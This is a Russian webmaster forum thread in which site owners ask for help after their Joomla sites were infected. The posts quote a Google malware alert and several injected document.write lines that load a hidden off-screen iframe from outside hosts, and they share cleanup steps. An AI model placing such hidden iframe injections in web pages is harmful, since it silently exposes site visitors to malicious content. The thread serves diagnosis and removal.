Проблемы с сайтом, внедрены вредоностные коды на сайте
Страницы: 1 2 3 4 5 След.
Проблемы с сайтом, внедрены вредоностные коды на сайте
Здравствуйте это мой сайт - www.zapichi-recept.ru/

сегодня такое случилось, войдя на сайт идёт предупреждение что на сайте вирусы...   от гугл в веб мастере пришло письмо где и что они подозревают что было внедрение... пожалуйста помогите кто может напишите...

Вредоносные программы
Предупреждение
Google обнаружил вредоносный код на вашем сайте . Теперь пользователи, переходящие на эти страницы по ссылкам в результатах поиска Google, будут видеть предупреждение. 
Рекомендуем как можно быстрее очистить ваш сайт.

www.zapichi-recept.ru/media/system/js/mootools.js
Возможный внедренный код
document.write('<iframe width="55" height="55" style="width:
100px;height:100px;position:absolute;left:-100px;top:0;" src
="zazcd.wikaba.com/geowgjwiehgwvbb.cfg?11"></iframe>'
);

www.zapichi-recept.ru/components/com_jcomments/libraries/joomlatune/ajax.js?v=4
Возможный внедренный код
document.write('<iframe width="55" height="55" style="width:
100px;height:100px;position:absolute;left:-100px;top:0;" src
="zazcd.wikaba.com/geowgjwiehgwvbb.cfg?11"></iframe>'
);

www.zapichi-recept.ru/components/com_jcomments/js/jcomments-v2.3.js?v=8
Возможный внедренный код
document.write('<iframe width="55" height="55" style="width:
100px;height:100px;position:absolute;left:-100px;top:0;" src
="zazcd.wikaba.com/geowgjwiehgwvbb.cfg?11"></iframe>'
);

www.zapichi-recept.ru/templates/yoo_pinboard/warp/js/warp.js
Возможный внедренный код
document.write('<iframe width="55" height="55" style="width:
100px;height:100px;position:absolute;left:-100px;top:0;" src
="zazcd.wikaba.com/geowgjwiehgwvbb.cfg?11"></iframe>'
);

www.zapichi-recept.ru/media/system/js/caption.js
Возможный внедренный код
document.write('<iframe width="55" height="55" style="width:
100px;height:100px;position:absolute;left:-100px;top:0;" src
="zazcd.wikaba.com/geowgjwiehgwvbb.cfg?11"></iframe>'
);
Такая же проблема. Нашли решение? Есть мнение что внедрен бекдор.
Для начала в jsках надо удалить
Цитата
document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://qmqlwsn.ddns.name/2b586b62b05a19e7e18157fa90a705de.sys?11"></iframe>');

Через БД попробовать поиск : zazcd.wikaba.com,  qmqlwsn.ddns.name, eval, base64, проверить файлы которые были изменены (хотя бы примерно) в день появления заразы, ну и попробовать айболита
Хостинг Beget на СУПРе
Подскажите что есть айболит?

Какие действия предпринять после очистки что бы зараза вновь не появлялась? Ибо через ~10 минут после очистки опять все заражается.
Цитата
exor пишет:
Подскажите что есть айболит?
http://www.cy-pr.com/forum/f80/t22007/

Цитата
exor пишет:
Какие действия предпринять после очистки что бы зараза вновь не появлялась?
Я хз, с жумлой связывался только для просмотра функционала админки)) Какие там рекомендации, для меня темный лес.
спасибо за помощь.

а какая направленность данного вируса?
направленность - спам на ваших всех страниц. или бесплатные вечные ссылки)...когда у меня беда такая случилось - пару сайтов удалил вообще, и на других своих запретил простую регистрацию, и при этом в коде регистрации удалил проверку по вопросу и картинкам) в итоге Юзеры не регаются, так то и так они могут смотреть все что захотят, и админы новые не появятся...поэтому совет - пересмотретьв се действия в Админпанели (если у вас ДЛЕ). там все видно будет.. А так лечить можно fix.ru есть еще айболит по латински. Ноу  них тоже базы долго обновляются по вредоносным вирусами и сайтам. Поэтому лучше руками все перешерстить, все шаблоны своего сайта перетрясите и ссылки лишниме эти удалите. Я так делал. обычно они размещают их в самом низу страницы с кодом страниц.
Регайтесь! Помогу с партнеркой! http://entercash.ru/index.php?refid_new=2349
Да, заражены все сайты на хостинге.  Есть полный бекап, -1 день, без заразы.
Вот думаю что делать. Бекап восстановлю, пароль на FTP поменян, поменять все пароли к базам? что еще сделать? Еще наверно есть root учетка хостера.
Сделала бекап, был бек дор на компе,начните проверять свой.Меняем все пароли, а так же делаем бекап.

Далее даю то что написал саппорт



1. Сменить пароли доступа.
2. Проверить свой ПК на наличие вируса.
3. Проверить свой сайт на наличие вируса.
4. Обновить скрипт до последней версии.
5. Проверить права доступа на файлы и каталоги вашего сайта. Права 777 не безопасны.
6. Узнать на форуме поддержки используемого скрипта о причинах подобной проблемы.
Цитата
Роман пишет:
Для начала в jsках надо удалить
Цитата
document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="qmqlwsn.ddns.name/2b586b62b05a19e7e18157fa90a705de.sys?11 ( www.cy-pr.com/%22qmqlwsn.ddns.name/2b586b62b05a19e7e18157fa90a705de.sys?11\%22 )"></iframe>');

Через БД попробовать поиск : zazcd.wikaba.com, qmqlwsn.ddns.name, eval, base64, проверить файлы которые были изменены (хотя бы примерно) в день появления заразы, ну и попробовать айболита
jsках где находится найти немогу(((
имелось ввиду все файлы с расширением .js
в самом конце файлов будет этот код.
Таже проблема. Сканирование до конца дождаться не могу - выкидывает по таймауту. А как вобще происходит заражение? у меня сайт на удаленном хостинге, в последний раз я что-то там менял больше месяца назад. Если что-то и меня, то захожу по фтп с линукс машины. Не пойму как зараза могла просочиться
как можно найти и убрать  эти коды? вирусы с сайта?
то же самое. появилось вчера. затронуты все сайты на аккаунте хостинге.
меняю пароли для ftp пользователей, заражение продолжается.
причем, в ftp-логах пусто.

если разместить чистый .js файл, в течение в среднем 10 минут происходит заражение.
и как что делать? как чистить?
Страницы: 1 2 3 4 5 След.
Похожие темы:
Читают тему (гостей: 2, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
13:04 Скан глаза для Zoom и Tinder + ап Яндекса 21 апреля. К этому реально всё идёт? 
13:01 Заказал "положить сайт" а положили тебя? Полиция добралась до клиентов DDoS-сервисов 
11:29 В Яндексе позиции держатся, а трафик проседает - стало заметно сильнее 
11:28 Claude по паспорту + апдейт Яндекса 17 апреля - у кого что по выдаче 
11:23 Штрафы за крипту до 2 млн + ап Яндекса 19 апреля - что опять поменяли и куда всё катится? 
17:05 ИКС Яндекс АПдейт 1 апреля 2026. Обновлён алгоритм расчёта 
16:58 Ап выдачи Яндекса 8 апреля - есть движение, но интереснее что творится с AI-ответами Google 
13:39 Вериф аккаунты АВИТО + платежи 
11:34 Прошу оценить сайт 
10:26 Мониторинг обменников Сrypto-scout.io 
09:13 Monitex: Мониторинг с кэшбэком 80% в USDT 
05:09 От $0.015 за IP | $0.68 за ГБ | 9PROXY.COM | 20+ млн резидентных прокси | 99,95% аптайм | Без чёрных списков 
23:49 GoodsMoney.io 
23:48 Volna.money 
11:31 Список обновленных тем пуст... 
11:21 ЕС сделал проверку возраста, а её уже ломают за минуты. Серьёзно? 
19:57 Во Франции начали штрафовать за IPTV - до 300-400 евро уже прилетает обычным пользователям 
17:02 арбитражники 
12:26 Заработок на загрузочном сайте в 2026? 
09:49 Точные прогнозы на футбол 
02:22 Ставки на супер тренды в спорте